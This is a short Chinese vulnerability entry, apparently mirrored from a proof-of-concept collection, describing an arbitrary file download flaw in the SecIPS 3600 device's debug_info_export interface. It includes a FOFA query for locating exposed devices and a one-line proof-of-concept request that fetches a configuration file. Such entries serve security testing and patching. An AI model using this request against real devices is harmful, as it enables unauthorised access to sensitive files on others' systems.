admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/网神 SecIPS 3600 debug_info_export 任意文件下载漏洞.md
Threekiii cfe90fbed7 更新漏洞
2023-03-14 09:11:27 +08:00

525 B
Raw Blame History

网神 SecIPS 3600 debug_info_export 任意文件下载漏洞

漏洞描述

网神 SecIPS 3600 debug_info_export接口存在任意文件下载漏洞攻击者通过漏洞可以获取服务器敏感文件

漏洞影响

网神 SecIPS 3600

FOFA

app="网神-SecIPS"

漏洞复现

登录页面

image-20230314090018282

验证POC

/webui/debug/debug_info_export?filename=default.cfg

image-20230314090033658